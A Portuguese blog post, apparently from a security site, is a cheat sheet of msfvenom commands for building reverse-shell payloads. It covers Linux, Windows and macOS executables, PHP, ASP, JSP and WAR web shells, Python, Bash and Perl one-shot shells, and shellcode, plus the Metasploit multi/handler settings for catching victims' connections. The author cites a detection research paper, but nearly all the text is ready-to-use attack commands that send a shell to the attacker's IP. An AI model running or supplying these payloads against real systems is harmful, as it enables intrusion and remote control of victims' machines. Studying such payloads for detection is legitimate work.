Home Hacking Criando Payloads de Shell Reverso com MSFVenom
Hacking

Criando Payloads de Shell Reverso com MSFVenom

por Daniel Oliveira
escrito por Daniel Oliveira
Criando Payloads de Shell Reverso com MSFVenom

Estou fazendo um artigo científico de detecção de shell reverso sobre os payload’s criados pelo KALI / Metasploit. Para tanto preciso primeiro criar estes malware’s. Este artigo visa apenas registrar o processo de criação de payload’s do MSFVenom para diversos sistemas como Windows, Linux, Mac e outros.

Os comandos são bem simples, LPORT e LHOST são a porta e IP do atacante que receberão o shell reverso. Por exemplo se for numa rede local você usará por exemplo 192.168.1.40 se for numa máquina de cara para internet você deverá usar seu IP público. É possível receber um shell reverso numa rede NATeada mas é necessário fazer o redirecionamento do IP público para o IP de intranet.

Listar os Payload’s

msfvenom -l

Tipos de Binários

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<SEU IP> LPORT=<SUA PORTA> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<SEU IP> LPORT=<Sua Porta> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f macho > shell.macho

Payload’s para servidores WEB

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Seu IP> LPORT=<Sua Porta> -f war > shell.war

Payload’s Adicionais

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Seu IP> LPORT=<Sua Porta> -f raw > shell.pl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handlers

Os Handlers colocam o metasploit na posição de receber as conexões reversas, ou seja, escutar o chamados das vítimas.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z

Agradeço a todos pela atenção e leitura.

Fonte: https://netsec.ws/?p=331

0 comentário
1
FacebookTwitterPinterestLinkedinWhatsappTelegram

É graduado em segurança da informação e pós graduado em computação forense e perícia digital. Possui as certificações LPIC-1 e 2, ITIL V3 e ISO 27002.

Artigos Similares

Criando um Shell Reverso (MSFVenom Payload) para Linux...

Deixe seu comentário

Salvar meu nome, email e website neste navegador para a próxima vez que eu comentar.